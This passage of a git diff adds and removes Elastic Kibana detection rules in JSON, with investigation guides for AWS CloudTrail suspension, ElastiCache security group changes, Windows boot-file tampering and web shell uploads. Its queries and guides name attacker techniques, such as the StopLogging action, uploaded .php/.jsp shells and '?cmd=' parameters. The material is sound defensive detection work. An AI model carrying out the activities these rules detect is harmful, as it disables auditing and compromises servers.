unusual errors may indicate an impending service failure state. Rare and unusual user error activity can also be due to manual troubleshooting or reconfiguration attempts by insufficiently privileged users, bugs in cloud automation scripts or workflows, or changes to IAM privileges." + ], + "from": "now-2h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "rare_error_code", + "name": "Rare AWS Error Code", + "note": "## Triage and analysis\n\n### Investigating Rare AWS Error Code\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and understanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity when deviations occur.\n\nThis rule uses a machine learning job to detect an unusual error in a CloudTrail message. This can be byproducts of attempted or successful persistence, privilege escalation, defense evasion, discovery, lateral movement, or collection.\n\nDetection alerts from this rule indicate a rare and unusual error code that was associated with the response to an AWS API command or method call.\n\n#### Possible investigation steps\n\n- Examine the history of the error. If the error only manifested recently, it might be related to recent changes in an automation module or script. You can find the error in the `aws.cloudtrail.error_code field` field.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. These may indicate the source of the program or the nature of the task being performed when the error occurred.\n - Check whether the error is related to unsuccessful attempts to enumerate or access objects, data, or secrets.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal time of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation module or script. If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence), it might be part of a housekeeping or maintenance process. You can find the command in the `event.action field` field.\n- The adoption of new services or the addition of new functionality to scripts may generate false positives.\n\n### Related Rules\n\n- Unusual City For an AWS Command - 809b70d3-e2c3-455e-af1b-2626a5a1a276\n- Unusual Country For an AWS Command - dca28dee-c999-400f-b640-50a081cc0fd1\n- Unusual AWS Command for a User - ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1\n- Spike in AWS Error Messages - 78d3d8d9-b476-451d-a9e0-7a5addd70670\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "aws", + "version": "^3.0.0" + } + ], + "risk_score": 21, + "rule_id": "19de8096-e2b0-4bd8-80c9-34a820813fff", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from AWS.\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### AWS Integration Setup\nThe AWS integration allows you to collect logs and metrics from Amazon Web Services (AWS) with Elastic Agent.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"aws\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAWS\u201d and select the integration to see more details about it.\n- Click \u201cAdd AWS\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201caws\u201d to an existing or a new agent policy, and deploy the agent on your system from which aws log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://www.elastic.co/docs/current/integrations/aws).\n", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1526", + "name": "Cloud Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1526/" + }, + { + "id": "T1580", + "name": "Cloud Infrastructure Discovery", + "reference": "https://attack.mitre.org/techniques/T1580/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [] + } + ], + "type": "machine_learning", + "version": 212 + }, + "id": "19de8096-e2b0-4bd8-80c9-34a820813fff_212", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1a3f2a4c-12d0-4b88-961a-2711ee295637_3.json b/packages/security_detection_engine/kibana/security_rule/1a3f2a4c-12d0-4b88-961a-2711ee295637_3.json new file mode 100644 index 00000000000..85d64eb86dd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1a3f2a4c-12d0-4b88-961a-2711ee295637_3.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to delete or modify critical files used during the boot process to prevent the system from booting. This may indicate a destructive attack behavior.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential System Tampering via File Modification", + "note": "## Triage and analysis\n\n### Investigating Potential System Tampering via File Modification\n\nThis rule identifies attempts to delete or modify critical files used during the boot process to prevent the system from booting.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.\n- Assess all deleted or modified system critical files and perform a complete recovery of those files to prevent system booting issues.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action, if not immedialy disable the account.\n\n### False positive analysis\n\n- Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and there are justifications for the execution.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - Prioritize cases involving critical servers and users.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If important data was encrypted, deleted, or modified, activate your data recovery plan.\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type in (\"change\", \"deletion\") and\n file.name : (\"winload.exe\", \"winlod.efi\", \"ntoskrnl.exe\", \"bootmgr\") and\n file.path : (\"?:\\\\Windows\\\\*\", \"\\\\Device\\\\HarddiskVolume*\\\\Windows\\\\*\") and\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\poqexec.exe\",\n \"?:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_*\\\\tiworker.exe\"\n ) and\n not file.path : (\n \"?:\\\\Windows\\\\WinSxS\\\\Temp\\\\InFlight\\\\*\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download*\",\n \"?:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows*\",\n \"?:\\\\Windows\\\\SystemTemp\\\\*\",\n \"?:\\\\Windows\\\\Temp\\\\????????.???\\\\*\",\n \"?:\\\\Windows\\\\Temp\\\\*\\\\amd64_microsoft-windows-*\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "1a3f2a4c-12d0-4b88-961a-2711ee295637", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Impact", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + }, + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "1a3f2a4c-12d0-4b88-961a-2711ee295637_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_209.json b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_209.json deleted file mode 100644 index b8dce897b93..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_209.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies suspending the recording of AWS API calls and log file delivery for the specified trail. An adversary may suspend trails in an attempt to evade defenses.", - "false_positives": [ - "Suspending the recording of a trail may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Trail suspensions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS CloudTrail Log Suspended", - "note": "## Triage and analysis\n\n### Investigating AWS CloudTrail Log Suspended\n\nAmazon CloudTrail is a service that enables governance, compliance, operational auditing, and risk auditing of your Amazon Web Services account. With CloudTrail, you can log, continuously monitor, and retain account activity related to actions across your Amazon Web Services infrastructure. CloudTrail provides event history of your Amazon Web Services account activity, including actions taken through the Amazon Management Console, Amazon SDKs, command line tools, and other Amazon Web Services services. This event history simplifies security analysis, resource change tracking, and troubleshooting.\n\nThis rule identifies the suspension of an AWS log trail using the API `StopLogging` action. Attackers can do this to cover their tracks and impact security monitoring that relies on this source.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Investigate the deleted log trail's criticality and whether the responsible team is aware of the deletion.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:StopLogging and event.outcome:success\n", - "references": [ - "https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_StopLogging.html", - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/stop-logging.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "1aa8fa52-44a7-4dae-b058-f3333b91c8d7", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Use Case: Log Auditing", - "Resources: Investigation Guide", - "Tactic: Defense Evasion" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 209 - }, - "id": "1aa8fa52-44a7-4dae-b058-f3333b91c8d7_209", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_207.json b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_207.json deleted file mode 100644 index 27d05239ac6..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_207.json +++ /dev/null @@ -1,94 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies when an ElastiCache security group has been modified or deleted.", - "false_positives": [ - "A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS ElastiCache Security Group Modified or Deleted", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS ElastiCache Security Group Modified or Deleted\n\nAWS ElastiCache security groups control inbound and outbound traffic to cache clusters, ensuring only authorized access. Adversaries may modify or delete these groups to bypass security controls, facilitating unauthorized data access or exfiltration. The detection rule monitors specific API actions related to security group changes, flagging successful modifications or deletions as potential defense evasion attempts.\n\n### Possible investigation steps\n\n- Review the CloudTrail logs for the specific event.provider: elasticache.amazonaws.com to identify the user or role that initiated the security group modification or deletion.\n- Examine the event.action field to determine the exact action taken, such as \"Delete Cache Security Group\" or \"Authorize Cache Security Group Ingress\", and assess the potential impact on security posture.\n- Check the event.outcome field to confirm the success of the action and correlate it with any other suspicious activities in the same timeframe.\n- Investigate the source IP address and location associated with the event to determine if it aligns with expected administrative activity.\n- Review the AWS IAM policies and permissions associated with the user or role to ensure they are appropriate and have not been overly permissive.\n- Assess the affected ElastiCache clusters to determine if any unauthorized access or data exfiltration attempts have occurred following the security group change.\n\n### False positive analysis\n\n- Routine maintenance activities by authorized personnel can trigger alerts when they modify security groups for legitimate reasons. To manage this, create exceptions for known maintenance windows or specific user actions.\n- Automated scripts or tools used for infrastructure management might modify security groups as part of their normal operation. Identify these scripts and exclude their actions from triggering alerts by using specific user or role identifiers.\n- Changes made by cloud management platforms or third-party services that integrate with AWS may also result in false positives. Review and whitelist these services if they are verified as non-threatening.\n- Regular updates or deployments that require temporary security group modifications can be mistaken for suspicious activity. Document these processes and adjust the detection rule to account for these expected changes.\n- Ensure that any changes made by trusted IP addresses or within a specific network range are reviewed and potentially excluded from alerting, as they may represent internal, authorized activities.\n\n### Response and remediation\n\n- Immediately isolate the affected ElastiCache instance by applying restrictive security group rules to prevent further unauthorized access.\n- Review CloudTrail logs to identify any unauthorized API calls related to the security group modifications and determine the source of the changes.\n- Revert any unauthorized changes to the ElastiCache security groups by restoring them to their previous state using backups or documented configurations.\n- Conduct a thorough investigation to identify any data exfiltration or unauthorized access that may have occurred due to the security group changes.\n- Escalate the incident to the security operations team for further analysis and to determine if additional security measures are required.\n- Implement additional monitoring and alerting for changes to ElastiCache security groups to ensure rapid detection of similar threats in the future.\n- Review and update IAM policies to ensure that only authorized personnel have permissions to modify ElastiCache security groups, reducing the risk of future unauthorized changes.", - "query": "event.dataset:aws.cloudtrail and event.provider:elasticache.amazonaws.com and event.action:(\"Delete Cache Security Group\" or\n\"Authorize Cache Security Group Ingress\" or \"Revoke Cache Security Group Ingress\" or \"AuthorizeCacheSecurityGroupEgress\" or\n\"RevokeCacheSecurityGroupEgress\") and event.outcome:success\n", - "references": [ - "https://docs.aws.amazon.com/AmazonElastiCache/latest/APIReference/Welcome.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "1ba5160d-f5a2-4624-b0ff-6a1dc55d2516", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.007", - "name": "Disable or Modify Cloud Firewall", - "reference": "https://attack.mitre.org/techniques/T1562/007/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1d306bf0-7bcf-4acd-83fd-042f5711acc9_1.json b/packages/security_detection_engine/kibana/security_rule/1d306bf0-7bcf-4acd-83fd-042f5711acc9_1.json new file mode 100644 index 00000000000..27604a54972 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1d306bf0-7bcf-4acd-83fd-042f5711acc9_1.json @@ -0,0 +1,136 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects potential initial access activity where an adversary uploads a web shell or malicious script to a web server via a file upload mechanism (e.g., through a web form using multipart/form-data), followed by a GET or POST request to access the uploaded file. By checking the body content of HTTP requests for file upload indicators such as \"Content-Disposition: form-data\" and \"filename=\", the rule identifies suspicious upload activities. This sequence of actions is commonly used by attackers to gain and maintain access to compromised web servers.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "logs-network_traffic.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Initial Access via File Upload Followed by GET Request", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Initial Access via File Upload Followed by GET Request\n\nThis rule flags a common initial-access pattern: a multipart/form-data upload that drops a dynamic web script on a server, followed shortly by a request to execute that file and establish a foothold. Attackers exploit a permissive upload form to plant shell.php or shell.jsp in an uploads or temp directory, then immediately request it to spawn a web shell, enumerate files, and run commands\u2014often leveraging redirects or 2xx/3xx responses that indicate successful placement and access.\n\n### Possible investigation steps\n\n- Correlate the upload transaction with the server-side file creation and the subsequent access to the same resource, matching timestamps, source IP, and path, and follow any redirects to the final executed file.\n- Retrieve the uploaded artifact from disk, verify it sits in a web-accessible location, inspect content for web shell traits (eval/system/exec, obfuscation, password gates), and record hashes.\n- Examine server process telemetry immediately after the access for interpreter or shell spawns and unexpected outbound connections originating from web server workers.\n- Review application logs and access context to determine whether the upload was authenticated, which account or session performed it, and whether user-agent, referer, or headers deviate from normal clients.\n- Broaden the timeline to identify related uploads, file renames, or repeated requests from the same actor, including parameterized calls that suggest command execution or directory enumeration.\n\n### False positive analysis\n\n- An authenticated administrator installs a legitimate plugin or module via the application\u2019s upload form, which unpacks or renames .php or .jsp files and then auto-loads a setup page, producing the multipart upload, file creation/rename, and immediate GET pattern.\n- Automated deployment or QA routines upload and deploy a .war or server-side script through a web-based admin interface and then perform health-check or warm-up requests, resulting in the same multipart upload, server-side file creation, and follow-up GET sequence.\n\n### Response and remediation\n\n- Immediately block access to the uploaded script that was invoked via GET/POST (e.g., /uploads/shell.php) and the source IPs that executed it, restrict the site to allowlisted IPs or maintenance mode, and temporarily disable the upload endpoint.\n- Quarantine and remove the uploaded web shell and any additional executable scripts or WARs in web-accessible directories (uploads, webroot, temp), terminate interpreter or shell processes spawned by the web server account (www-data/nginx/w3wp/tomcat), and revert malicious .htaccess/web.config rewrites.\n- Hunt for persistence and lateral-movement artifacts created after the upload, including recent .php/.jsp/.cgi file creations or renames in static asset folders, cron/systemd tasks, startup scripts, unauthorized admin users or plugins, and remove them.\n- Restore altered application files from known-good backups or redeploy a clean container/VM, rotate database and API credentials stored in config files or environment variables, invalidate active sessions, and only re-enable uploads after confirming execution is blocked in upload directories.\n- Escalate to incident command and privacy/legal if you observe command execution parameters on the uploaded page (?cmd=, ?exec=), shells spawning (/bin/sh, powershell.exe), database dumps, or outbound callbacks from web server processes to external hosts.\n- Harden by storing uploads outside the webroot, denying execution in upload paths (disable PHP/CGI handlers and set noexec permissions), enforcing strict extension/MIME allowlists and AV/sandbox scanning for multipart/form-data, enabling file-integrity alerts on new .php/.jsp in served paths, and deploying WAF rules to block direct requests to uploaded executables.\n", + "query": "sequence by agent.id with maxspan=5m\n [network where\n data_stream.dataset == \"network_traffic.http\" and\n http.request.method in (\"POST\", \"PUT\") and\n /* We can restrict to 200 in the future, but I prefer to broaden the scope and decrease it later if necessary */\n http.response.status_code in (200, 201, 204, 301, 302, 303, 409) and\n /* These should detect most common file upload activities, adhering to browser standards */\n http.request.body.content like \"*Content-Disposition: form-data*\" and\n http.request.body.content like \"*filename=*\"\n /* May add a lower/upper boundary limit to reduce FPs in the future, e.g.\n and http.request.body.bytes >= 500\n */\n ]\n [file where\n event.dataset == \"endpoint.events.file\" and\n event.action in (\"creation\", \"rename\") and\n file.extension in (\"php\", \"phtml\", \"pht\", \"php5\", \"asp\", \"aspx\", \"jsp\", \"jspx\", \"war\", \"cgi\")\n /* We can add file.path values here in the future, if telemetry is noisy */\n ]\n [network where\n data_stream.dataset == \"network_traffic.http\" and\n http.request.method in (\"GET\", \"POST\") and\n /* we may restrict to 200, but keeping it broader right now */\n http.response.status_code >= 200 and http.response.status_code < 600 and\n url.extension in (\"php\", \"phtml\", \"pht\", \"php5\", \"asp\", \"aspx\", \"jsp\", \"jspx\", \"war\", \"cgi\")\n ]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "network_traffic", + "version": "^1.33.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "data_stream.dataset", + "type": "constant_keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "http.request.body.content", + "type": "wildcard" + }, + { + "ecs": true, + "name": "http.request.method", + "type": "keyword" + }, + { + "ecs": true, + "name": "http.response.status_code", + "type": "long" + }, + { + "ecs": true, + "name": "url.extension", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1d306bf0-7bcf-4acd-83fd-042f5711acc9", + "setup": "## Setup\n\nThis rule requires data coming in from both Elastic Defend (for file events) and Network Packet Capture integrations (for HTTP traffic analysis).\n\n### Network Packet Capture Integration Setup\n\n**IMPORTANT**: This rule requires HTTP request body capture to be enabled in order to detect the multipart/form-data content containing WebKitFormBoundary indicators. The network traffic integration must be configured to capture HTTP request bodies for POST requests with `multipart/form-data` content type.\n\nTo enable HTTP request body capture, follow these steps:\n1. Navigate to the Fleet policy leveraging the Network Packet Capture integration in Kibana.\n2. Locate and select the \"Network Packet Capture\" integration, and edit the integration.\n3. Locate \"Change Default\", and scroll down to the \"HTTP\" section.\n4. Enable the \"HTTP\" toggle to capture HTTP traffic, add the correct ports for your web application, and click \"advanced options\".\n5. Edit the integration settings to enable HTTP request body capture for POST requests with `multipart/form-data` content type.\n6. Save the integration configuration and wait for the policy to deploy to the agents.\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "Domain: Web", + "Domain: Network", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Network Traffic", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.003", + "name": "Web Shell", + "reference": "https://attack.mitre.org/techniques/T1505/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 1 + }, + "id": "1d306bf0-7bcf-4acd-83fd-042f5711acc9_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1d4ca9c0-ff1e-11ee-91cc-f661ea17fbce_3.json 